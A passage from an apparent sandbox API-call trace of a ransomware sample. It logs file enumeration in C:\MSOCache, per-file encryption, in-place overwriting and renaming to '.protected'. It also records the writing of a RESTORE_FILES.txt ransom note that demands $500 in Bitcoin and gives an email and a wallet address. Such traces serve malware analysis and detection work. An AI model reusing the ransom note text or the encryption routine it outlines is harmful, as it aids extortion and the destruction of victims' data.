nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesWritten=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0060.938] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.938] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0060.938] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0060.938] CloseHandle (hObject=0xb4) returned 1 [0060.939] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.protected") returned 93 [0060.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.protected")) returned 1 [0060.939] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0060.939] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.939] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0060.939] lstrcmpW (lpString1="Setup.xml", 
lpString2="RESTORE_FILES.txt") returned 1 [0060.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.939] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.939] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.940] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0060.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.940] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0060.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.940] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0060.940] ReadFile (in: hFile=0xb4, lpBuffer=0x48ca20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesRead=0x295f174*=0xa40, lpOverlapped=0x0) returned 1 [0060.946] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff5c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.946] WriteFile (in: hFile=0xb4, lpBuffer=0x48ca20*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesWritten=0x295f174*=0xa40, lpOverlapped=0x0) returned 1 [0060.947] SetFilePointerEx (in: hFile=0xb4, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.947] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0060.947] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0060.947] CloseHandle (hObject=0xb4) returned 1 [0060.947] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0060.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0060.948] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0060.948] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0060.948] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0060.948] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0060.949] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0060.949] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0060.949] lstrlenA (lpString="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") returned 684 [0060.949] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0060.950] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0060.950] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0060.950] CloseHandle (hObject=0xa4) returned 1 [0060.950] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0060.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned 66 [0060.950] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0060.950] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0060.950] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*") returned 68 [0060.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0061.072] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.072] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.072] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.072] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.072] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.072] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.") returned 68 [0061.072] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.072] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0061.072] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0061.072] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.073] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.073] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.073] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.073] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.073] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.073] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.073] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.073] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..") returned 69 [0061.073] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.073] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.073] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0061.073] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0061.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.073] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.073] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files") returned -1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files (x86)") returned -1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0061.073] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.073] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".protected") returned 0x0 [0061.073] lstrcmpW (lpString1="Office32WW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0061.074] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.074] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.074] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.074] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.075] StrStrW 
(lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0061.075] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.075] StrStrW (lpFirst="Office32WW.msi", lpSrch=".rar") returned 0x0 [0061.075] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.075] StrStrW (lpFirst="Office32WW.msi", lpSrch=".zip") returned 0x0 [0061.075] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.086] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.086] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.158] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.158] CloseHandle (hObject=0xb4) returned 1 [0061.159] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected") returned 91 [0061.159] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.protected")) returned 1 [0061.165] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files") returned -1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files (x86)") returned -1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0061.165] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.165] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".protected") returned 0x0 [0061.165] lstrcmpW (lpString1="Office32WW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0061.165] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.165] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.166] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.166] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.166] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0061.166] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.166] StrStrW (lpFirst="Office32WW.xml", lpSrch=".rar") returned 0x0 [0061.166] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.166] StrStrW (lpFirst="Office32WW.xml", lpSrch=".zip") returned 0x0 [0061.166] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0061.180] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.180] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0061.180] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.180] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.180] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.180] CloseHandle (hObject=0xb4) 
returned 1 [0061.180] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected") returned 91 [0061.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.protected")) returned 1 [0061.181] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files") returned -1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files (x86)") returned -1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0061.181] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.181] StrStrIW (lpFirst="ose.exe", lpSrch=".protected") returned 0x0 [0061.181] lstrcmpW (lpString1="ose.exe", lpString2="RESTORE_FILES.txt") returned -1 [0061.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.181] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.184] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.184] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0061.184] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.184] StrStrW (lpFirst="ose.exe", lpSrch=".rar") returned 0x0 [0061.184] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.184] StrStrW (lpFirst="ose.exe", lpSrch=".zip") returned 0x0 [0061.184] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.196] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.196] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.219] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.219] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.251] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, 
